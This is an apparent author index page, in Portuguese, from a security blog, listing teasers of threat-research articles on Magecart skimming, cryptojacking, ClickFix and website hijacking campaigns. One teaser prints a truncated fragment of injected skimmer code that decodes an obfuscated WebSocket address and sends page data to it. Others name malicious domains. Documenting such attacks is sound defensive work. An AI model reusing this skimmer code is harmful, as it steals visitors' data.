Articles by Himanshu Anand
CryptoJacking está morto: viva o CryptoJacking
O cryptojacking moderno evoluiu para ataques silenciosos e de múltiplos estágios.
Himanshu AnandMagecart mirando sites de e-commerce do Leste Asiático no OpenCart
Detectamos um ataque no estilo Magecart direcionado à plataforma de CMS OpenCart
Himanshu AnandComo o sequestro de tráfego e a fraude de afiliados podem prejudicar sites e usuários
Sequestro de tráfego é quando alguém altera secretamente o destino dos links de um site, redirecionando visitantes para outros sites.
Himanshu AnandDepender de Indicadores de Comprometimento é suficiente para sua segurança?
A maioria dos programas de segurança ainda depende fortemente de Indicadores de Comprometimento (IOCs). Essa abordagem falha em detectar ameaças que evoluem lentamente, reutilizam infraestrutura ou operam em contextos restritos e de alto valor, como o web skimming no lado do cliente.
Himanshu AnandAtaque Client-Side ao CoinMarketCap: Uma Análise Completa
Em 20 de junho de 2025, o CoinMarketCap (CMC) — um pilar do ecossistema de criptomoedas, utilizado por milhões de pessoas para dados cripto em tempo real — sofreu um incidente de segurança significativo.
Himanshu AnandGoogle OAuth Armado Dispara WebSocket Malicioso
Um atacante está usando 'Google.com' para entregar e executar seu próprio código em um ataque armado ao Google OAuth.
Himanshu AnandAtaques implacáveis do lado do cliente visando múltiplas plataformas com ClickFix
Neste artigo, detalhamos uma variante recente do ClickFix que agora é direcionada para macOS, Android e iOS, usando redirecionamentos baseados em navegador, prompts de interface de usuário falsos e até mesmo técnicas de download drive-by.
Himanshu AnandGolpe Adulto Chinês Mira Usuários Mobile via PWA
Identificamos uma nova campanha de injeção que abusa de JavaScript de terceiros para redirecionar usuários.
Himanshu AnandMais de 150 mil sites afetados por sequestro de página inteira com links para sites de apostas chineses
Estimamos que aproximadamente 150.000 sites foram afetados por esta campanha. O script define um array de palavras-chave relacionadas a apostas, jogos de azar e marcas de cassino em inglês e em chinês.
Himanshu AnandMilhares de sites atingidos por quatro backdoors em ataque a JavaScript de terceiros
Ao analisar ameaças direcionadas a frameworks WordPress, encontramos um ataque em que um único arquivo JavaScript de terceiros foi usado para injetar quatro backdoors separados em 1.000 sites comprometidos usando cdn.csyndication[.]com/.
Himanshu AnandMais de 35.000 Sites Atacados em Sequestro de Página Inteira Vinculado a um Golpe de Jogo em Idioma Chinês
Uma nova campanha de malware comprometeu mais de 35.000 sites, injetando um script malicioso a partir dos domínios listados abaixo. Assim que o script é carregado, ele sequestra completamente a janela do navegador do usuário — geralmente redirecionando-o para páginas que promovem uma plataforma de jogos de azar (ou cassino) em idioma chinês.
Himanshu AnandMais de 10.000 Sites WordPress Encontrados Distribuindo Malware para MacOS e Windows
Identificamos mais de 10.000 sites WordPress exibindo uma falsa página de atualização do navegador Google que leva ao download de malware.
Himanshu AnandSites governamentais e universitários alvos de ataque client-side ScriptAPI[.]dev
Ontem descobrimos outro ataque JavaScript client-side visando +500 sites, incluindo governos e universidades. Os scripts injetados criam links ocultos no Document Object Model (DOM), apontando para sites externos, uma interface de programação para documentos web.
Himanshu AnandO custo dos falsos positivos - como nos tornamos um alvo
Esta semana, identificamos um caso de uso intrigante envolvendo o ataque WP3[.]XYZ (link para nossa postagem no blog). Isso despertou interesse em toda a comunidade e levou a melhores taxas de detecção em plataformas como o VirusTotal (link do VirusTotal). Embora a maioria tenha apreciado nossos esforços, outros nos criticaram por não identificar a causa raiz ou recomendar serviços para limpar sites hackeados. Apesar disso, nosso objetivo é conscientizar a comunidade sobre possíveis ataques e prometemos fazer ainda melhor no futuro. Quando falsos
Himanshu AnandMais de 5.000 sites WordPress capturados em ataque de malware WP3[.]XYZ
Descobrimos uma campanha generalizada de malware direcionada a sites WordPress, afetando mais de 5.000 sites globalmente. O domínio malicioso: \"https://wp3.xyz/plugin[.]php\".
Himanshu AnandNovo ataque de script JS de terceiros encontrado: Artifyau[.]com e Quantifymy[.]com
Esta semana, implantamos um crawler especializado para fins de pesquisa. Em apenas 24 horas, ele identificou com sucesso novos padrões de ataque Magecart. Magecart é uma ameaça sofisticada e financeiramente motivada que injeta JavaScript malicioso para roubar informações pessoais de pagamento. Aqui está uma lista dos maiores ataques Magecart até o momento. Detecção inicial: JavaScript ofuscado em Artifyau[.]com URL detectada: https://artifyau[.]com/T1M0dVluVnBiR1J6YVhSbGNISnZMbU52YlE9PQ/jqwery.js. A URL imita um
Himanshu AnandNovo código de ataque Magecart revelado
No dia 14 de outubro, publicamos um artigo sobre como mais um ataque Magecart ao Magento estava acontecendo. Na época, identificamos apenas um script como responsável. Hoje, conseguimos encontrar e analisar o ataque com mais detalhes. O ataque decodificado Este foi o código injetado: <script> const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23]; const zep = 42; window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.h
Himanshu AnandSite de e-commerce do Kuwait está sendo usado para facilitar ataques de skimming client-side
Um site de e-commerce popular no Kuwait, executando uma versão desatualizada do Magento (2.4), foi comprometido por uma injeção de JavaScript malicioso,
Himanshu AnandAtaque JavaScript Magecart client-side na Cisco
Mais um dia, mais um ataque JavaScript client-side de alto perfil. Nesta manhã, lemos que a Cisco é a próxima vítima de código malicioso sendo
Himanshu AnandAtaque à cadeia de suprimentos web através de jQuery trojanizado no npm, GitHub e CDNs
Ataques foram encontrados em jQuery trojanizado no GitHub, npm e jsDelivr em um novo ataque à cadeia de suprimentos web. Cada pacote tinha uma cópia do jQuery
Himanshu Anand